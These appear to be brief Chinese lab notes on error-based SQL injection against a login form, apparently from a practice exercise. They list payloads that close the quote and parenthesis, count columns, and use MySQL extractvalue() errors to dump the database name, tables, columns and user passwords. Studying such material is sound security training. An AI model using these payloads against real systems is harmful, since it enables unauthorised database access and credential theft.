判断是单引号单括号字符型注入,并且成功注入时无回显,所以用报错注入:
uname=admin')&passwd=&submit=Submit
uname=admin')#&passwd=&submit=Submit
判断列数:
uname=admin')+order+by+2#&passwd=&submit=Submit
爆库:
uname=admin')+and+extractvalue(1,concat(0x7e,(select+database())))#&passwd=&submit=Submit
爆表名:
uname=admin')+and+extractvalue(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database())))#&passwd=&submit=Submit
爆列名:
uname=admin')+and+extractvalue(1,concat(0x7e,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='users')))#&passwd=&submit=Submit
爆数据:
uname=admin')+and+extractvalue(1,concat(0x7e,(select+group_concat(username,password)+from+users)))#&passwd=&submit=Submit
